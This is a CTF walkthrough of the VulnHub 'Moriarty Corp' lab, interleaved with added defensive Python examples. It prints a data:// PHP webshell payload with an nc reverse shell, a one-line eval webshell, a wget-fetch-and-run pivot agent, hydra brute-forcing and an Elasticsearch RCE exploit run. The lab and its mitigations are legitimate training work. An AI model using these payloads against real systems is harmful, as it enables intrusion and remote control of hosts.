## Overview

| Name | Template |
| --- | --- |
| Release Date | 2024-11-09 |
| Write-up Author | kill3r |
| Machine Author | kill3r |
| Difficulty | Medium |
| User Flag | |
| Root Flag | |
| Link | https://www.vulnhub.com/entry/boredhackerblog-moriarty-corp,456/ |
## Description

- As an agent, assist in investigating the illegal dealings of the world's largest arms dealer!
- The lab consists of 6 tasks; each time you complete a task and submit its flag, the next task is unlocked.
- The web panel is on port 8000 (out of scope; do not attack it).
- Flags are stored as #_flag.txt and are entered in the flag{} format. They are usually stored in the / directory but may be in a different location.
- When you add a flag, the web application starts docker containers in the background. Shutting down and restarting will break this.

Tasks involved:

- Port scanning
- Webapp attacks and bug hunting
- Pivoting (meterpreter strongly recommended)
- Password guessing / brute forcing
## Related skills

1. File inclusion
2. Tunnelling / proxying (venom/ew)
3. File upload
4. Hash collision (MD5 lookup)
5. Logic vulnerabilities
## Nmap scan

```bash
ports=$(nmap -p- --min-rate=1000 -T4 192.168.56.100 | grep -oE '(^[0-9][^/tcp]*)' | tr '\n' ',')
nmap -p$ports -sV -sC -O 192.168.56.100 -oN nmap.txt
```

The first command uses nmap to scan every port on the target (1 to 65535); `--min-rate=1000` sends at least 1000 packets per second and `-T4` selects the aggressive timing template. `grep -oE '(^[0-9][^/tcp]*)'` extracts the port numbers from the output, and `tr '\n' ','` joins them into one comma-separated string. The second command runs nmap again against only those ports: `-p$ports` passes the extracted port list, `-sV` performs service version detection, `-sC` runs the default NSE scripts, `-O` performs OS detection, and `-oN nmap.txt` saves the results to a file named nmap.txt.

```bash
┌──(root㉿kill3r)-[/home/kill3r]
└─# ports=$(nmap -p- --min-rate=1000 -T4 192.168.56.100 | grep -oE '(^[0-9][^/tcp]*)' | tr '\n' ',')

┌──(root㉿kill3r)-[/home/kill3r]
└─# nmap -p$ports -sV -sC -O 192.168.56.100 -oN nmap.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-09 10:01 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.104
Host is up (0.00054s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 5a:a7:c8:64:2a:54:bc:64:48:16:2b:79:64:69:cc:45 (RSA)
|   256 89:8d:6a:9b:44:e3:f1:f1:ef:8c:23:13:7a:84:fc:71 (ECDSA)
|_  256 1d:e6:68:27:52:5b:6d:0d:67:5d:30:4c:03:68:b3:2a (ED25519)
8000/tcp open  http    Werkzeug httpd 0.14.1 (Python 2.7.15rc1)
|_http-server-header: Werkzeug/0.14.1 Python/2.7.15rc1
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
9000/tcp open  http    Portainer Docker UI 1.19.2
|_http-title: Portainer
MAC Address: 08:00:27:C8:E8:21 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.54 ms 192.168.56.104

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.23 seconds
```
## Enumeration

### SMB enumeration

> Ports: 139 389 445 636

`enum4linux -a/-A 127.0.0.1`

```bash
msf6 > use auxiliary/scanner/smb/smb_version
msf6 > use auxiliary/scanner/smb/smb_enumshares
msf6 > use auxiliary/scanner/smb/smb_lookupsid
```

### Web

> HTTP web server, ports like: 80 443 81 8080 8443 4443 8081

Finger: obtains information about a specific user, or the list of users and configuration, on a system.

- `whatweb`: identifies and analyses the target site's technology stack, CMS (content management system), plugins, framework and other site-related information by analysing the site's responses and page content.

```bash
┌──(root㉿kill3r)-[~]
└─# whatweb 192.168.56.100
http://192.168.56.100 [200 OK] Apache[2.4.46], Bootstrap, Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.46 (Debian)], IP[192.168.56.100], Script[text/javascript]
```

- Directory enumeration

`dirb http://192.168.56.100`
`dirsearch -u http://192.168.56.100 -r`
`gobuster dir -w ... -u http://192.168.56.100 -x html,php,js,bak`

```bash
┌──(root㉿kill3r)-[~]
└─# gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.56.100 -x html,php,js,bak
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.100
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              html,php,js,bak
[+] Timeout:                 10s
===============================================================
2023/08/03 22:01:51 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 1620]
/profile.php          (Status: 200) [Size: 1473]
/javascript.js        (Status: 200) [Size: 0]
/javascript           (Status: 301) [Size: 321] [--> http://192.168.56.100/javascript/]
/exploit.html         (Status: 200) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1099312 / 1102805 (99.68%)
===============================================================
2023/08/03 22:03:22 Finished
===============================================================
```

```bash
$ nikto -h http://www.example.com/
$ nuclei -u https://example.com/
```
## Walkthrough

Enter `flag{start}` on port 8000 to open the first level.

### Level 1

Visit port 80. The two pages differ only in the file name, which immediately suggests file inclusion. Start a listener on Kali: `nc -lvvp 6666`

```
data%3A//text/plain%3Bbase64%2CPD9waHAgJHZhcj1zaGVsbF9leGVjKCRfR0VUWydjbWQnXSk7Pz4%3D&cmd=rm +/tmp/f;mkfifo +/tmp/f;cat +/tmp/f%7C/bin/sh+2>%261%7Cnc+192.168.56.102+6666+%3E/tmp/f
```
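The Level 1 include bug from the defender's side, as an added example that is not part of the write-up: a Python model of the decision an include handler should make on its page parameter, checked against the write-up's own payload. `ALLOWED_PAGES`, `classify_include` and `decode_wrapper_payload` are assumed names; the lab's PHP is not shown on the page.

```python
import base64
from urllib.parse import unquote, urlparse

# Hypothetical allow-list: the only pages the application legitimately serves.
ALLOWED_PAGES = {"index": "index.html", "profile": "profile.php"}

# The include value used in the write-up (URL-encoded), kept here as test input.
LEVEL1_PAYLOAD = ("data%3A//text/plain%3Bbase64%2C"
                  "PD9waHAgJHZhcj1zaGVsbF9leGVjKCRfR0VUWydjbWQnXSk7Pz4%3D")


def classify_include(raw_value):
    """Return ('allow', file) or ('deny', reason) for a user-supplied include parameter.

    An include that passes the raw value to include()/require() accepts any PHP
    stream wrapper (data://, php://, http://), so the fix is an allow-list, not
    a blacklist of bad strings.
    """
    value = unquote(raw_value)
    scheme = urlparse(value).scheme.lower()
    if scheme:
        return "deny", "wrapper scheme %r" % scheme
    if ".." in value or value.startswith("/") or "\x00" in value:
        return "deny", "path traversal or null byte"
    if value not in ALLOWED_PAGES:
        return "deny", "not an allow-listed page"
    return "allow", ALLOWED_PAGES[value]


def decode_wrapper_payload(raw_value):
    """For a data: value, show what the server would have executed (for triage/logging).

    Returns None when the value is not a data: URL.
    """
    value = unquote(raw_value)
    if not value.lower().startswith("data:"):
        return None
    header, _, body = value.partition(",")
    if header.endswith(";base64"):
        return base64.b64decode(body).decode("utf-8", "replace")
    return body
```

Logging the verdict and the decoded body gives the detection signal the web tier otherwise lacks: a `data:` scheme in an include parameter is never legitimate traffic.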
Submit the first-level flag to move on to the next level.
### Level 2

```bash
┌──(root㉿kill3r)-[/opt/proxy/Venom]
└─# ls
admin.exe        admin_linux_x86  agent_arm_eabi5  agent_linux_x64  agent_macos_x64        changelog
admin_linux_x64  admin_macos_x64  agent.exe        agent_linux_x86  agent_mipsel_version1  scripts

┌──(root㉿kill3r)-[/opt/proxy/Venom]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
```

On the compromised host, fetch the agent:

```bash
cd /tmp
wget http://192.168.56.102/agent_linux_x64
chmod +x agent_linux_x64
```

On Kali, start the admin node and connect the agent to it:

```bash
┌──(root㉿kill3r)-[/opt/proxy/Venom]
└─# chmod +x admin_linux_x64

┌──(root㉿kill3r)-[/opt/proxy/Venom]
└─# ./admin_linux_x64 -lport 9999
```

```bash
./agent_linux_x64 -rhost 192.168.56.102 -rport 9999
2023/09/09 08:43:12 [+]Successfully connects to a new node
```

```bash
(admin node) >>> show
A
+ -- 1

(admin node) >>> goto 1
node 1
(node 1) >>> socks 9090
a socks5 proxy of the target node has started up on the local port 9090.
```

Point proxychains at the SOCKS port:

```bash
vim /etc/proxychains4.conf
socks5 127.0.0.1 9090
```

```bash
┌──(root㉿kill3r)-[/opt/lan]
└─# proxychains4 nmap 172.17.0.0/24 -sV -sT -Pn -p80
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-09 17:21 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
[proxychains] Strict chain  ...  127.0.0.1:9090  ...  172.17.0.1:80  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9090  ...  172.17.0.2:80 <--socket error or timeout !
[proxychains] Strict chain  ...  127.0.0.1:9090  ...  172.17.0.3:80  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9090  ...  172.17.0.4:80  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9090  ...  172.17.0.7:80 <--socket error or timeout !
[proxychains] Strict chain  ...  127.0.0.1:9090  ...  172.17.0.10:80 <--socket error or timeout !
[proxychains] Strict chain  ...  127.0.0.1:9090  ...  172.17.0.13:80 <--socket error or timeout !
[proxychains] Strict chain  ...  127.0.0.1:9090  ...  172.17.0.16:80
```
172.17.0.4:80 is found. Open a browser through the proxy (`proxychains4 firefox`) and visit it: it asks for a password, so brute-force it with Burp. But once the browser is pointed at Burp's proxy port it can no longer be given the SOCKS proxy as well, so use Burp's upstream (second-level) proxy mode; after that everything works normally. Now use the one-line webshell `<?php @eval($_POST['a']);?>`: select the webshell, enter an arbitrary password, turn on intercept and submit, send the request to Intruder, mark the password as the payload position, choose a dictionary and start the attack. Configure the proxy in AntSword (蚁剑) and get the flag.

```
flag{picture_is_worth_1000_words}
```
### Level 3 (hash collision)

A batch of accounts and encrypted passwords is found; the passwords look like MD5.

```bash
┌──(root㉿kill3r)-[/home/kill3r]
└─# hash-identifier 63a9f0ea7bb98050796b649e85481845
--------------------------------------------------
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
```

It is MD5; crack it with an online lookup site.

```
root
toor
password
admin
guest
MORIARTY
MCORP
mcorp
weapons
moriarty
```

Write the accounts and the passwords into separate txt files, scan for machines with port 22 open, and brute-force them with hydra.

```bash
┌──(root㉿kill3r)-[/opt/vulnhub/MoriartyCorp]
└─# proxychains4 nmap 172.17.0.0/24 -sV -sT -Pn -p22
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-09 19:05 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
[proxychains] Strict chain  ...  127.0.0.1:9090  ...  172.17.0.1:22  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9090  ...  172.17.0.2:22 <--socket error or timeout !
[proxychains] Strict chain  ...  127.0.0.1:9090  ...  172.17.0.3:22 <--socket error or timeout !
[proxychains] Strict chain  ...  127.0.0.1:9090  ...  172.17.0.4:22 <--socket error or timeout !
[proxychains] Strict chain  ...  127.0.0.1:9090  ...  172.17.0.5:22  ...  OK

┌──(root㉿kill3r)-[/opt/vulnhub/MoriartyCorp]
└─# proxychains4 hydra -L admin -P password 172.17.0.5 ssh
[22][ssh] host: 172.17.0.5   login: root   password: weapons

┌──(root㉿kill3r)-[/opt/vulnhub/MoriartyCorp]
└─# proxychains4 ssh root@172.17.0.5
```
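An added example, not from the write-up, showing why the Level 3 hashes fall to a short word list and what salted, iterated storage changes. `LEVEL3_HASH` is the hash the write-up identified (it is the MD5 of `root`) and `RECOVERED_WORDLIST` is the list recovered above; `md5_dictionary_lookup`, `hash_password` and `verify_password` are assumed names, not the lab's code.

```python
import hashlib
import hmac
import os

LEVEL3_HASH = "63a9f0ea7bb98050796b649e85481845"   # from the write-up
RECOVERED_WORDLIST = ["root", "toor", "password", "admin", "guest",
                      "MORIARTY", "MCORP", "mcorp", "weapons", "moriarty"]


def md5_dictionary_lookup(hexdigest, wordlist):
    """Unsalted MD5 is a pure function of the password, so one precomputed
    table answers every hash in the dump. Returns the matching word or None."""
    table = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    return table.get(hexdigest.lower())


# Hardened storage: per-user salt plus an iterated KDF (stdlib only; argon2 or
# bcrypt are preferable where a library is available).
PBKDF2_ROUNDS = 200_000


def hash_password(password, salt=None):
    """Return 'pbkdf2_sha256$rounds$salt_hex$digest_hex' with a fresh 16-byte salt."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return "pbkdf2_sha256$%d$%s$%s" % (PBKDF2_ROUNDS, salt.hex(), digest.hex())


def verify_password(password, stored):
    """Recompute with the stored salt and rounds; compare in constant time."""
    algo, rounds, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                    bytes.fromhex(salt_hex), int(rounds))
    return hmac.compare_digest(candidate.hex(), digest_hex)


def same_password_same_hash(password):
    """True for unsalted MD5-style storage, False once a random salt is used:
    two users with the same password no longer share a hash, so one table
    no longer covers the whole dump."""
    return hash_password(password) == hash_password(password)
```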
### Level 4

The credentials are given to us, and the hint says the target may be on one of these ports, so focus the scan on them.

```bash
┌──(root㉿kill3r)-[/opt/vulnhub/MoriartyCorp]
└─# proxychains4 nmap 172.17.0.0/24 -sV -sT -Pn -p443,8000,8080,8888
```

The scan took ages but finally finished. Log in with the credentials. It looks like a chat room with a chat function and a change-password function. A user named admin is found. Next, inspect the change-password function to see whether it allows changing an arbitrary user's password. Guessing that there is no authorization check, change the username to admin and try it: it seems to work. Log in from a private window: the login succeeds and the flag is there.
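The Level 4 bug modelled in plain Python, as an added example that is not the lab's code: the change-password handler trusts the `username` field of the form, so any logged-in user can reset admin's password, while the fixed handler takes the identity from the server-side session and re-checks the current password. `make_users`, the session and form dictionaries and the two handler names are assumptions; the user table is constructed.

```python
import hashlib
import hmac
import os


def _pw_hash(password, salt):
    # Short salted PBKDF2 helper for the constructed user table below.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 50_000).hex()


def make_users():
    """Constructed user table; the lab's real users and passwords are not known."""
    users = {}
    for name, pw in (("admin", "admin-secret"), ("alice", "alice-pass")):
        salt = os.urandom(8)
        users[name] = {"salt": salt, "pw": _pw_hash(pw, salt)}
    return users


def check_password(users, name, password):
    rec = users[name]
    return hmac.compare_digest(_pw_hash(password, rec["salt"]), rec["pw"])


def change_password_vulnerable(session, form, users):
    """The Level 4 pattern: the account to update comes from the request body,
    and nothing checks that it matches the logged-in user."""
    if "user" not in session:
        return 401
    target = form["username"]                      # attacker-controlled
    if target not in users:
        return 404
    users[target]["pw"] = _pw_hash(form["new_password"], users[target]["salt"])
    return 200


def change_password_fixed(session, form, users):
    """Identity comes only from the server-side session, and the current password
    is re-verified so a stolen session alone cannot rotate the credential."""
    if "user" not in session:
        return 401
    target = session["user"]
    if form.get("username", target) != target:
        return 403                                 # refuse to act on another account
    if not check_password(users, target, form.get("current_password", "")):
        return 403
    users[target]["pw"] = _pw_hash(form["new_password"], users[target]["salt"])
    return 200
```

A 403 on a username mismatch is also worth alerting on: in normal use the form never names a different account than the session holder.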
### Level 5

The hint tells us there is an Elasticsearch instance.

```bash
┌──(root㉿kill3r)-[/opt/vulnhub/MoriartyCorp]
└─# proxychains4 nmap 172.17.0.0/24 -sV -sT -Pn -p9200
```

```bash
┌──(root㉿kill3r)-[/opt/vulnhub/MoriartyCorp]
└─# searchsploit elasticsearch
--------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                       |  Path
--------------------------------------------------------------------- ---------------------------------
ElasticSearch - Remote Code Execution                                | linux/remote/36337.py
ElasticSearch - Remote Code Execution                                | multiple/webapps/33370.html
ElasticSearch - Search Groovy Sandbox Bypass (Metasploit)            | java/remote/36415.rb
ElasticSearch 1.6.0 - Arbitrary File Download                        | linux/webapps/38383.py
ElasticSearch 7.13.3 - Memory disclosure                             | multiple/webapps/50149.py
ElasticSearch < 1.4.5 / < 1.5.2 - Directory Traversal                | php/webapps/37054.py
ElasticSearch Dynamic Script - Arbitrary Java Execution (Metasploit) | java/remote/33588.rb
Elasticsearch ECE 7.13.3 - Anonymous Database Dump                   | multiple/webapps/50152.py
--------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

┌──(root㉿kill3r)-[/opt/vulnhub/MoriartyCorp]
└─# searchsploit elasticsearch -m 36337.py
[!] Could not find EDB-ID

  Exploit: ElasticSearch - Remote Code Execution
      URL: https://www.exploit-db.com/exploits/36337
     Path: /usr/share/exploitdb/exploits/linux/remote/36337.py
    Codes: CVE-2015-1427, OSVDB-118239
 Verified: True
File Type: Python script, Unicode text, UTF-8 text executable
Copied to: /opt/vulnhub/MoriartyCorp/36337.py

┌──(root㉿kill3r)-[/opt/vulnhub/MoriartyCorp]
└─# python2 36337.py
[... ASCII-art banner omitted ...]
Exploit for ElasticSearch , CVE-2015-1427 Version: 20150309.1
Use: 36337.py target

┌──(root㉿kill3r)-[/opt/vulnhub/MoriartyCorp]
└─# proxychains4 python2 36337.py 172.17.0.7
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[... ASCII-art banner omitted ...]
Exploit for ElasticSearch , CVE-2015-1427 Version: 20150309.1
{*} Spawning Shell on target... Do note, its only semi-interactive...
Use it to drop a better payload or something
~$ ls
[proxychains] Strict chain  ...  127.0.0.1:9090  ...  172.17.0.7:9200  ...  OK
6_flag.txt  bin  boot  buyers.txt  dev  elasticsearch  elasticsearch-1.4.2.tar.gz  etc  home  lib  lib64  main.sh  media  mnt  opt  proc  root  run  sbin  srv  sys  tmp  usr  var
~$ cat 6_flag.txt
[proxychains] Strict chain  ...  127.0.0.1:9090  ...  172.17.0.7:9200  ...  OK
flag{game_over}
~$
```
## End